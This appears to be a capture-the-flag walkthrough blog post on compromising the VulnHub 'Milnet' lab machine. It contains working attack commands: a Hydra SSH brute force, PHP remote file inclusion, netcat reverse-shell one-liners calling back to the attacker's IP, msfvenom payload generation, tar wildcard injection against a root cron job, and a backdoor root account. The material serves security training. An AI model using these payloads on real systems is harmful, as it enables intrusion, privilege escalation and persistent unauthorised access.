In this post we examine Milnet, a vulnerable target hosted on http://www.vulnhub.com
The pentester began by identifying the IP address of the target using netdiscover.
root@kali2:~# netdiscover -r 192.168.73.0/24
192.168.73.130 00:0c:29:bd:ec:5f 1 60 VMware, Inc.
The pentester used nmap to identify network applications.
root@kali2:~# nmap -Pn -n -p- -T4 192.168.73.130
22/tcp open ssh
80/tcp open http
root@kali2:~# nmap -A -Pn -n -p 22,80 192.168.73.130
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.35
The target does not appear to be vulnerable to remote access exploits. The pentester initiated a password attack against the SSH service using THC Hydra.
root@kali2:/usr/share/wordlists# hydra -l root -P fasttrack.txt -e nsr ssh://192.168.73.130
With the password attack underway, the pentester began enumerating the web server with Nikto. The scan results indicated that a web page, /info.php, was present and may contain sensitive information.
root@kali2:/# nikto -h 192.168.73.130
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
The pentester then began a manual examination of the web server by browsing to each page, reviewing the source code, and understanding the functionality of the web site. After an initial examination, the pentester browsed to the following URI:
This page contains a significant amount of information regarding the PHP version running on the web server.
One entry catches the pentester’s eye, which suggests that a file inclusion vulnerability may be present:
The pentester needs more information to construct an effective attack. The pentester utilized OWASP-ZAP to scan the target web server for vulnerabilities.
root@kali2:/# owasp-zap &
OWASP-ZAP reported a remote file inclusion vulnerability affecting URI: http://192.168.73.130/content.php in the POST parameter of the HTTP header.
To prepare a file inclusion attack, the pentester enabled the Firefox web browser extension, Tamper Data, which functions as a proxy to intercept HTTP requests and modify GET/POST parameters. The pentester opened a netcat listener on TCP port 80, and prepared a test exploit in Tamper data by browsing to the afflicted URI, intercepting the request, and modifying the POST parameter value with a test exploit string. After submitting the request, the pentester confirms that this is a classic remote file inclusion vulnerability.
The pentester tried uploading various backdoors and reverse shell PHP code; however, the environment prevented the code from executing. Instead, the pentester refined his exploitation to utilize a PHP data stream exploit, which can result in arbitrary code execution.
The pentester first crafted a test command in PHP:
<?php system(‘ls -lsa /bin’); ?>
The pentester took the above string, and converted it to base64 using an online base64 encoder.
Next, the pentester constructed the following string:
The pentester then repeated the initial RFI exploit method, this time using the crafted base64 command in the POST parameter value. It works, and the pentester receives the output of the ls -lsa /bin command, revealing various binaries in the /bin directory. The pentester identifies netcat in this directory, and prepares a new attack to achieve a remote shell.
First, the pentester opens a listener on his attack platform:
nc -nlvp 1234
Next, the pentester crafts a reverse shell one liner. Notice that traditional netcat reverse shells do not work in this environment; instead, the following string was constructed to achieve the same effect:
<?php system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.73.133 1234 >/tmp/f’); ?>
The pentester took the above string and base64 encoded it. The pentester then crafted the following string, which will serve as our reverse shell payload:
As before, the pentester took the reverse shell payload string and inserted it into the POST parameter value of the /content.php request using Tamper Data. The pentester then received a reverse shell with low level privileges of the www-data user.
The pentester then began post exploitation activities, focusing on privilege escalation. First, the pentester needed a shell with greater stability. To achieve this, the pentester used msfvenom to create a new reverse shell payload. The pentester then hosted it in a web server, and used wget from the target to download the file.
On Attack Platform:
service apache2 start
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.73.133 lport=4444 -f elf -o backdoor.elf
nc -nlvp 4444
chmod 755 backdoor.elf
The pentester now had a more stable shell to the victim. The pentester then used python to spawn a tty terminal for greater functionality.
python3 -c ‘import pty; pty.spawn(“/bin/sh”)’
Now the pentester focused on privilege escalation. The pentester used an automated script to examine the target for any possible privilege escalation vulnerabilities. The privilege escalation script can be downloaded from:
chmod 755 linenum.sh
The script will run through many entries on the system to find possible vulnerabilities. The pentester noticed several entries of interest.
A user known as T. G. Langman appears to be the only conventional user account on the system.
langman:x:1000:1000:T. G. Langman,,,:/home/langman:/bin/bash
His home directory is world readable and executable.
drwxr-xr-x 4 langman langman 4.0K May 21 22:27 langman
There is also a backup script that runs every minute.
*/1 * * * * root /backup/backup.sh
The pentester examined the contents of /backup/backup.sh and observes that it uses tar to backup the contents of the /var/www/html directory every minute. This does not appear overtly vulnerable.
tar cf /backup/backup.tgz *
Remembering that Langman’s directory was not read or execute restricted, the pentester navigated to his directory and began examining his files, finding one of particular interest:
Section 4.3 of DefenseCode_Unix_WildCards_Gone_Wild.txt reveals a shell command injection technique targeting tar. In essence, the technique works by creating files whose filename contains parameters and arguments that can be injected into shell commands, if the proper conditions exist. The pentester crafts commands in order to try this technique.
First, the pentester opened an additional listener on his attack platform:
nc -nlvp 2112
On the target/victim, the pentester crafts three files to achieve arbitrary command execution stemming from the tar command within the backup.sh script.
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.73.133 2112 >/tmp/f” > shell.sh
touch “/var/www/html/–checkpoint-action=exec=sh shell.sh”
In essence, the crafted filenames cause the tar command to run the file, shell.sh after the first file is archived. Since the backup.sh script is running as root, this has the effect of spawning a netcat shell and sending it to the attack platform on port 2112.
After about 1 minute, the pentester receives a callback and with it, root permissions. The pentester now has total control over the system.
To sustain easy access, the pentester created a new user with root privileges.
useradd -ou 0 -g 0 michael
This was target was a great exercise in remote file inclusions and shell poisoning. The best ways of mitigating these issues is by sanitizing user inputs. Remember the old adage of programming: garbage in, garbage out. Thanks for the great exercise Warrior. See you next time on noob2root. Cheers.